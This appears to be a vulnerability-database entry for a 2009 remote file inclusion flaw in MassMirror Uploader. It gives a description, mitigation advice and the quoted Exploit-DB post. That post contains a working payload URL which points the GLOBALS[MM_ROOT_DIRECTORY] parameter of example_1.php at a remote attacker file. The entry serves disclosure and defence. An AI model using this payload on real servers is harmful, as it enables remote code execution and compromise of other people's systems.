MassMirror Uploader RFI Vulnerability

vendor:

Uploader

by:

ViciOuS

9,3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Uploader

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

MassMirror Uploader RFI Vulnerability

A Remote File Inclusion (RFI) vulnerability exists in MassMirror Uploader, which allows an attacker to include a remote file containing malicious code, resulting in arbitrary code execution on the vulnerable server. The vulnerability is due to insufficient sanitization of user-supplied input to the 'GLOBALS[MM_ROOT_DIRECTORY]' parameter in 'example_1.php'. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server.

Mitigation:

Input validation should be used to prevent the inclusion of remote files. Additionally, the web server should be configured to deny requests to files with multiple file extensions.

Source

Exploit-DB raw data:

=====================================================================================
MassMirror Uploader RFI Vulnerability
=====================================================================================


########################################################################################

Author : ViciOuS

Author Web Page :http://www.sabotaj.in

Email : vicious[at]sabotaj.in

Script Page : http://massmirror.com/uploader/

########################################################################################
 
RFI :

http://localhost/Base/example_1.php?GLOBALS[MM_ROOT_DIRECTORY]=http://evilcode.txt??

########################################################################################
Thanks WwW.sabotaj.iN , KocKaf52 
########################################################################################